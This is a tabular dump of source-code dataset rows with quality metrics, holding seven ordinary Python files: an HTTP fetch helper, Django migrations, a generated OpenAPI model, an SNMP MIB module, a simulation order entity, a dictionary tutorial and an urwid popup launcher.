hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca0f8935849a303fbba95f69b04309b363fb4396 | 283 | py | Python | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | src/web.py | zmcx16/ChaldeaStockObservatory-Core | 7e8a063961de7568c34f8e6c228757923e8c05cf | [
"MIT"
] | null | null | null | import requests
from common import *
def send_request(url):
    try:
        res = requests.get(url)
        res.raise_for_status()
    except Exception as exc:
        print('Generated an exception: %s' % exc)
        return ERR_WEB_ERROR, exc
    return ERR_SUCCESS, res.text
| 17.6875 | 49 | 0.64311 | 38 | 283 | 4.631579 | 0.736842 | 0.102273 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.275618 | 283 | 15 | 50 | 18.866667 | 0.858537 | 0 | 0 | 0 | 1 | 0 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca0fa23769829004e7ffb2c63d03ff9112e69e4d | 837 | py | Python | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | null | null | null | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | 9 | 2020-07-09T15:29:48.000Z | 2020-07-29T13:05:30.000Z | app/account/migrations/0009_relation.py | nabechin/article | 63bbaaaa9c194cc259456c46d8c3ccd0f8ee10c1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.12 on 2020-06-03 11:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    dependencies = [
        ('account', '0008_auto_20200530_1309'),
    ]

    operations = [
        migrations.CreateModel(
            name='Relation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('follower', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='follower', to=settings.AUTH_USER_MODEL)),
                ('target', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='target', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 34.875 | 158 | 0.658303 | 98 | 837 | 5.479592 | 0.530612 | 0.05959 | 0.078212 | 0.122905 | 0.353818 | 0.268156 | 0.268156 | 0.268156 | 0.268156 | 0.268156 | 0 | 0.048706 | 0.215054 | 837 | 23 | 159 | 36.391304 | 0.768645 | 0.054958 | 0 | 0 | 1 | 0 | 0.08872 | 0.029151 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca1122f4acfb056bec2609b88ea6a3ab622c77e3 | 1,502 | py | Python | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | data-storage-manager/src/simcore_service_dsm/rest/generated_code/models/error_model.py | mguidon/aiohttp-dsm | 612e4c7f6f73df7d6752269965c428fda0276191 | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from .base_model_ import Model
from .. import util
class ErrorModel(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).

    Do not edit the class manually.
    """

    def __init__(self, errors=None):  # noqa: E501
        """ErrorModel - a model defined in OpenAPI

        :param errors: The errors of this ErrorModel.  # noqa: E501
        :type errors: List[str]
        """
        self.openapi_types = {
            'errors': 'List[str]'
        }

        self.attribute_map = {
            'errors': 'errors'
        }

        self._errors = errors

    @classmethod
    def from_dict(cls, dikt) -> 'ErrorModel':
        """Returns the dict as a model

        :param dikt: A dict.
        :type: dict
        :return: The ErrorModel of this ErrorModel.  # noqa: E501
        :rtype: ErrorModel
        """
        return util.deserialize_model(dikt, cls)

    @property
    def errors(self):
        """Gets the errors of this ErrorModel.

        :return: The errors of this ErrorModel.
        :rtype: List[str]
        """
        return self._errors

    @errors.setter
    def errors(self, errors):
        """Sets the errors of this ErrorModel.

        :param errors: The errors of this ErrorModel.
        :type errors: List[str]
        """
        self._errors = errors
| 23.107692 | 96 | 0.591877 | 175 | 1,502 | 4.977143 | 0.354286 | 0.041332 | 0.110218 | 0.086108 | 0.253731 | 0.082664 | 0.082664 | 0 | 0 | 0 | 0 | 0.015429 | 0.309587 | 1,502 | 64 | 97 | 23.46875 | 0.824494 | 0.424767 | 0 | 0.086957 | 0 | 0 | 0.052113 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.217391 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ca13cd70000bf83f234b4a5745e0f78ca209c481 | 3,555 | py | Python | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/CISCO-CAS-IF-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CISCO-CAS-IF-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-CAS-IF-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:35:01 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
AgentCapabilities, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "ModuleCompliance", "NotificationGroup")
TimeTicks, Integer32, iso, ObjectIdentity, Unsigned32, IpAddress, Bits, MibIdentifier, Counter64, Counter32, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Integer32", "iso", "ObjectIdentity", "Unsigned32", "IpAddress", "Bits", "MibIdentifier", "Counter64", "Counter32", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ciscoCasIfCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 122))
ciscoCasIfCapability.setRevisions(('2009-12-04 00:00', '2004-08-10 00:00', '2003-12-03 00:00',))
if mibBuilder.loadTexts: ciscoCasIfCapability.setLastUpdated('200912040000Z')
if mibBuilder.loadTexts: ciscoCasIfCapability.setOrganization('Cisco Systems, Inc.')
ciscoCasIfCapabilityV5R000 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV5R000 = ciscoCasIfCapabilityV5R000.setProductRelease('MGX8850 Release 5.0')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV5R000 = ciscoCasIfCapabilityV5R000.setStatus('current')
ciscoCasIfCapabilityV5R015 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV5R015 = ciscoCasIfCapabilityV5R015.setProductRelease('MGX8850 Release 5.0.15')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV5R015 = ciscoCasIfCapabilityV5R015.setStatus('current')
ciscoCasIfCapabilityV12R04TPC3xxx = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 122, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV12R04TPC3xxx = ciscoCasIfCapabilityV12R04TPC3xxx.setProductRelease('CISCO IOS 12.4T for Integrate Service\n Router (ISR) c2xxx and c3xxx platforms.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoCasIfCapabilityV12R04TPC3xxx = ciscoCasIfCapabilityV12R04TPC3xxx.setStatus('current')
mibBuilder.exportSymbols("CISCO-CAS-IF-CAPABILITY", ciscoCasIfCapabilityV5R015=ciscoCasIfCapabilityV5R015, ciscoCasIfCapability=ciscoCasIfCapability, ciscoCasIfCapabilityV5R000=ciscoCasIfCapabilityV5R000, PYSNMP_MODULE_ID=ciscoCasIfCapability, ciscoCasIfCapabilityV12R04TPC3xxx=ciscoCasIfCapabilityV12R04TPC3xxx)
| 101.571429 | 477 | 0.775527 | 358 | 3,555 | 7.695531 | 0.379888 | 0.008711 | 0.041379 | 0.056624 | 0.445372 | 0.349546 | 0.349546 | 0.349546 | 0.349546 | 0.345554 | 0 | 0.096005 | 0.091702 | 3,555 | 34 | 478 | 104.558824 | 0.7572 | 0.09564 | 0 | 0.222222 | 0 | 0 | 0.247037 | 0.020898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.259259 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca19502a1cceb17f754e2906fb093b11b8434812 | 2,136 | py | Python | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | 2 | 2020-11-04T17:34:38.000Z | 2021-08-13T07:55:23.000Z | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | null | null | null | simulation/model/blocks/order.py | fladdimir/csa-simulation-based-sc-forecast | 80f176a783496f8859609f63b56c6199a73d9909 | [
"MIT"
] | 2 | 2021-05-28T02:55:44.000Z | 2021-08-03T13:56:10.000Z | import logging
from casymda.blocks.entity import Entity
from simpy.core import Environment
class Order(Entity):
    def __init__(self, env: Environment, name: str):
        super().__init__(env, name)
        self._time_of_acceptance = -1
        self._initial_eta = -1
        self._eta = -1
        self._ready_at = -1
        self._sop_at = -1
        self._finished_at = -1

    @property
    def time_of_acceptance(self):
        return self._time_of_acceptance

    @time_of_acceptance.setter
    def time_of_acceptance(self, value):
        self._time_of_acceptance = value
        update(
            self.name,
            "time_of_acceptance",
            self._time_of_acceptance,
            self.env.now,
            self,
        )

    @property
    def initial_eta(self):
        return self._initial_eta

    @initial_eta.setter
    def initial_eta(self, value):
        self._initial_eta = value
        update(self.name, "initial_eta", self._initial_eta, self.env.now, self)

    @property
    def eta(self):
        return self._eta

    @eta.setter
    def eta(self, value):
        self._eta = value
        update(self.name, "eta", self._eta, self.env.now, self)

    @property
    def ready_at(self):
        return self._ready_at

    @ready_at.setter
    def ready_at(self, value):
        self._ready_at = value
        update(self.name, "ready_at", self._ready_at, self.env.now, self)

    @property
    def sop_at(self):
        return self._sop_at

    @sop_at.setter
    def sop_at(self, value):
        self._sop_at = value
        update(self.name, "sop_at", self._sop_at, self.env.now, self)

    @property
    def finished_at(self):
        return self._finished_at

    @finished_at.setter
    def finished_at(self, value):
        self._finished_at = value
        update(self.name, "finished_at", self._finished_at, self.env.now, self)


def update(name: str, attribute: str, value: float, t: float, order: Order):
    # (replaced by actual callback during emulation initialization)
    logging.info(
        f"order update - name: {name}, attribute: {attribute}, value: {value}, t: {t}"
    )
| 25.428571 | 86 | 0.623596 | 281 | 2,136 | 4.455516 | 0.163701 | 0.057508 | 0.102236 | 0.091054 | 0.242812 | 0.107827 | 0.087859 | 0 | 0 | 0 | 0 | 0.003856 | 0.271536 | 2,136 | 83 | 87 | 25.73494 | 0.800771 | 0.028558 | 0 | 0.09375 | 0 | 0.015625 | 0.063676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21875 | false | 0 | 0.046875 | 0.09375 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca1b5eb38de0a406ce502a3a1fd87938d360c350 | 3,498 | py | Python | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-python-containers_dictionary.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS231n Convolutional Neural Networks for Visual Recognition
http://cs231n.github.io/
Python Numpy Tutorial
http://cs231n.github.io/python-numpy-tutorial/

python_numpy_tutorial-python-containers_dictionary.py
2019-07-03 (Wed)
"""
# Python Numpy Tutorial > Python > Containers
# Python's built-in container types:
# lists, dictionaries, sets, and tuples.
#
# (Python) Lists
# a mutable ordered list of values.
# A list is the Python equivalent of an array with useful functions.
# A Python list is resizeable and
# can contain elements of different types.
#
# Dictionaries
# stores key-value pairs
#
# Sets
# an unordered collection of distinct elements.
#
# Tuples
# an immutable ordered list of values.
# A tuple is similar to a list, but different in that
# tuples can be used as keys in dictionaries and
# as elements of sets.
#
# =[,,] (Python) list ~= Dynamic array (with useful functions)
# ={:,:,:} Dictionary ~= Map
# ={,,} Set = Set
# =(,) Tuples ~= (Python) list
#
# This example covers:
# Lists
# Slicing
# A concise syntax to access sublists.
# Loops
# You can loop over the elements of a list.
# The enumerate function returns the index & value.
# List comprehensions
# A concise way to loop through a list.
# e.g. 3 lines of code -> 1 line of code
#
# Dictionaries
# (Basics)
# Loops
# Dictionary comprehensions
#
# Sets
# (Basics)
# Loops
# Iterating over a set has the same syntax as a list.
# However you cannot make assumptions about the order.
# Set comprehensions
# Like list comprehension & dictionary comprehension,
# constructing a set is easy with set comprehensions.
#
# Tuple
# (Basics)
#
# Read more about:
# 4.6.4. Lists¶
# https://docs.python.org/3.5/library/stdtypes.html#lists
#
# 4.9. Set Types — set, frozenset¶
# https://docs.python.org/3.5/library/stdtypes.html#set
#
# 4.10. Mapping Types — dict
# https://docs.python.org/3.5/library/stdtypes.html#dict
#
# 5.3. Tuples and Sequences
# https://docs.python.org/3.5/tutorial/datastructures.html#tuples-and-sequences
print('Dictionary')
# Create a new dictionary
d = {'cat':'cute','dog':'furry'}
print( d )
#{'cat': 'cute', 'dog': 'furry'}
print( d['cat'] )
# cute
# Check if a dictionary has 'cat'.
print( 'cat' in d )
# True
# Set an entry in the dictionary.
d['fish'] = 'wet'
print( d['fish'] )
# wet
print( d )
#{'cat': 'cute', 'dog': 'furry', 'fish': 'wet'}
# Get an element with a default
print( d.get('monkey', 'N/A') )
# N/A
# because 'monkey' is not there, prints N/A
# Get an element with a default
print( d.get('fish','N/A') )
#wet
# because 'fish' is there, prints the value of it!
del d['fish']
print( d.get('fish','N/A') )
#N/A
# because 'fish' is deleted, 'fish' isn't in the list of the keys.
# So prints N/A
print('Loops')
d = {'person':2, 'cat':4, 'spider':8}
for animal in d: # Only the key is returned
    #print( animal )
    legs = d[animal]
    print('A %s has %d legs.' %(animal, legs))
print('Dictionary comprehensions')
# Dictionary comprehensions are similar to list comprehensions.
# But these allow you to easily construct dictionaries.
nums = [0, 1, 2, 3, 4]
even_num_to_square = {x: x**2 for x in nums if x%2 == 0}
print( even_num_to_square )
#{0: 0, 2: 4, 4: 16} | 26.70229 | 81 | 0.636078 | 512 | 3,498 | 4.337891 | 0.361328 | 0.01891 | 0.034219 | 0.032418 | 0.235029 | 0.167042 | 0.139127 | 0.105808 | 0.105808 | 0.03602 | 0 | 0.02115 | 0.22956 | 3,498 | 131 | 82 | 26.70229 | 0.801113 | 0.785592 | 0 | 0.190476 | 0 | 0 | 0.201849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.619048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
ca23c1c1fb9f0996c3429cd643f93153fd251931 | 307 | py | Python | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 39 | 2016-01-04T04:13:27.000Z | 2022-01-18T19:17:24.000Z | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 140 | 2015-11-01T01:19:54.000Z | 2022-03-10T13:00:33.000Z | tracker/migrations/0016_merge_20190914_1249.py | TreZc0/donation-tracker | 3a833a5eba3c0b7cedd8249b44b1435f526095ba | [
"Apache-2.0"
] | 35 | 2016-01-20T12:42:21.000Z | 2022-01-20T07:06:47.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.22 on 2019-09-14 16:49
from django.db import migrations
class Migration(migrations.Migration):

    dependencies = [
        ('tracker', '0015_add_speedrun_twitch_name'),
        ('tracker', '0015_add_allow_donations'),
    ]

    operations = [
    ]
| 18.058824 | 53 | 0.638436 | 37 | 307 | 5.108108 | 0.837838 | 0.116402 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109244 | 0.224756 | 307 | 16 | 54 | 19.1875 | 0.684874 | 0.224756 | 0 | 0 | 1 | 0 | 0.285106 | 0.225532 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca2c0ab19ea859d07a1be0aeaa1c9e6aba93dfd7 | 5,424 | py | Python | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 69 | 2019-05-16T06:40:18.000Z | 2022-03-24T06:23:49.000Z | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 36 | 2019-05-15T19:55:24.000Z | 2021-07-22T07:07:14.000Z | mitzasql/ui/widgets/session_popup_launcher.py | vladbalmos/mitzasql | 06c2a96eb4494095b2b72bc1454199a4940b0700 | [
"MIT"
] | 8 | 2019-05-16T06:56:28.000Z | 2022-02-11T02:24:12.000Z | # Copyright (c) 2021 Vlad Balmos <vladbalmos@yahoo.com>
# Author: Vlad Balmos <vladbalmos@yahoo.com>
# See LICENSE file
import urwid
from .. import main_loop as shared_main_loop
from .error_dialog import ErrorDialog
from .info_dialog import InfoDialog
from .quit_dialog import QuitDialog
class SessionPopupLauncher(urwid.PopUpLauncher):
    DEFAULT_WR = 60
    DEFAULT_HR = 30

    def __init__(self, widget):
        super().__init__(widget)
        self._max_width = None
        self._max_height = None
        self._width_ratio = self.DEFAULT_WR
        self._height_ratio = self.DEFAULT_HR
        # Used in testing
        self.showing_error_modal = False
        self._popup_factory_method = None

    def create_pop_up(self):
        return self._popup_factory_method()

    def get_pop_up_parameters(self):
        width = int(self._width_ratio * self._max_width / 100)
        height = int(self._height_ratio * self._max_height / 100)
        left = (self._max_width - width) / 2
        top = (self._max_height - height) / 2
        return {'left': left, 'top': top, 'overlay_width': width,
                'overlay_height': height}

    def close_pop_up(self, *args, **kwargs):
        self.showing_error_modal = False
        self._reset_popup_size_ratio()
        return super().close_pop_up()

    def quit(self, *args, **kwargs):
        raise urwid.ExitMainLoop()

    def show_fatal_error(self, error):
        self.showing_error_modal = True

        def factory_method():
            dialog = ErrorDialog(error, title=u'Unhandled Exception',
                                 prefix='An unhandled error occured. Exception details:')
            urwid.connect_signal(dialog, dialog.SIGNAL_OK, self.quit)
            return urwid.Filler(dialog)

        self._popup_factory_method = factory_method
        return self.open_pop_up()

    def show_error(self, error, on_close=None):
        self.showing_error_modal = True

        def on_ok_signal(*args, **kwargs):
            self.close_pop_up()
            if callable(on_close):
                on_close()

        def factory_method():
            dialog = ErrorDialog(error)
            urwid.connect_signal(dialog, dialog.SIGNAL_OK, on_ok_signal)
            return urwid.Filler(dialog)

        self._popup_factory_method = factory_method
        return self.open_pop_up()

    def show_info(self, message, on_close=None):
        def on_ok_signal(*args, **kwargs):
            self.close_pop_up()
            if callable(on_close):
                on_close()

        def factory_method():
            dialog = InfoDialog(message)
            urwid.connect_signal(dialog, dialog.SIGNAL_OK, on_ok_signal)
            return urwid.Filler(dialog)

        self._popup_factory_method = factory_method
        return self.open_pop_up()

    def close_pop_up_then(self, callback):
        '''Close popup then execute callback'''
        def fn(*args, **kwargs):
            self.close_pop_up()
            callback()
        return fn

    def show_quit_dialog(self, on_no=None):
        def factory_method():
            dialog = QuitDialog()
            urwid.connect_signal(dialog, dialog.SIGNAL_OK, self.quit)
            if on_no is not None:
                urwid.connect_signal(dialog, dialog.SIGNAL_CANCEL,
                                     self.close_pop_up_then(on_no))
            else:
                urwid.connect_signal(dialog, dialog.SIGNAL_CANCEL,
                                     self.close_pop_up)
            return urwid.Filler(dialog)

        self._popup_factory_method = factory_method
        return self.open_pop_up()

    def show_loading_dialog(self):
        self._width_ratio = 40
        self._height_ratio = 30

        def factory_method():
            dialog = urwid.Text(u'\nLoading...', align='center')
            dialog = urwid.Filler(dialog)
            dialog = urwid.AttrMap(urwid.LineBox(dialog), 'linebox')
            return dialog

        self._popup_factory_method = factory_method
        result = self.open_pop_up()
        shared_main_loop.refresh()
        return result

